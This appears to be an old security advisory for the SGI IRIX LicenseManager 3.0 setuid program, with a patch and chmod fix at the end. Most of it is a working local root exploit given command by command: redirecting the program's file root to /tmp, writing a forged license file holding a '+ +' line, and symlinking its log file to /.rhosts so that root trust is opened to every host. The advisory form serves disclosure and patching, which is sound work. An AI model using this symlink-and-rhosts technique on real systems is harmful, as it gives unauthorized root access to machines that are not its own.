COMMAND

    /usr/etc/LicenseManager

SYSTEMS AFFECTED

    IRIX 5.3, IRIX 6.1, 6.2, 6.3

PROBLEM

    Yes, LM 3.0 is far more safe than 1.0, I agree with that.  So  now
    it's not a newborn  and milk bottle but  teenager and pack of  gum
    in his locker in the school (which he apparently forgot to  lock).
    Huge leap forward.

    As one can easily notice,  LicenseManager 3.0 (LM30 for short)  is
    considerably enhanced as compared to LM 1.0.  For example, if  one
    tries to repeat  recently published exploit  for LM 1.0,  it won't
    work, because /.rhosts is  not in /var/flexlm/licensefile.db.   So
    brute force attack won't  work.  RTFMing can  help to find it  out
    right away, and as far as I  can tell it seems to work.   So let's
    just  abandon  the  whole  idea  of  forging  license  file and go
    investigate  what  other  file  I/O  program  actually does.  Most
    important files live in /var/flexlm.

    /var/flexlm/license.dat.log  is   not  in   that  writable   files
    database, but obviously LM30 writes to it.  Exactly what we  need.
    But how to use it?

    Our  friend  strings  tells  us   how.   Among  wide  variety   of
    environment  variables  used  by  LM30  one  is  standing   alone,
    LICENSEMGR_FILE_ROOT.   The  very  name  says  what  it's  for  --
    getting  root  (on  the  system,  but  I  guess  developers  meant
    something else.   Whatever).   Some playing  with it  will quickly
    show that indeed that variable  sets the root directory for  LM30.
    We can now pick a new root directory:

        mkdir -p /tmp/var/flexlm

    so that we have exact equivalent of /var/flexlm, just with /tmp
    prepended to it.  LICENSEMGR_FILE_ROOT will make LM30 aceept our
    understanding of what is the right root directory.

        setenv LICENSEMGR_FILE_ROOT /tmp

    Now, LM30 deals with licenses, so let's make one, we'll need it

        cd /tmp/var/flexlm
        cat > license.dat
        #
        # FLEXlm license file
        #

        FEATURE \
        + + blah sgifd 1.00 01-jan-0 0 blah
        ^D

    License is all set.  And of cource we need log file, don't we?

        ln -s /.rhosts license.dat.log

    now check that your DISPLAY is set correctly, and, ladies and
    gentlemen, please welcome:

        LicenseManager &

    Front panel  will show  that indeed  LM30 thinks  about our little
    joke as a license.   Let's update it, and click  Update... button.
    It will show four fields for us to fill out. Putting blah in  each
    of them  will be  fine.   Or whatever  you feel  is a  good input.
    Some people  like foo,  I like  blah.   And, finally, click apply.
    Obviously, LM30 will be pissed at  us, and it will log the  record
    of our nasty behaviour, and pop  up some error dialog box --  just
    ignore it and go straight back to the original command line:

        cat /.rhosts

    Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

        #
        # FLEXlm license file
        #

        FEATURE \
        + + blah sgifd 1.00 01-jan-0 0 blah

    You know what happens  next, I guess.   Credit for this text  goes
    to Yuri Volobuev.

SOLUTION

    chmod -s  /usr/etc/LicenseManager or  get new  release of  FLEXlm.
    For some extra info see #3  of this story in mUNIXes section.   As
    for IRIX, best solution would be to apply following patches:

        OS Version     Patch #
        ----------     -------
        IRIX 5.3       1678
        IRIX 6.1       upgrade
        IRIX 6.2       1678
        IRIX 6.3       1695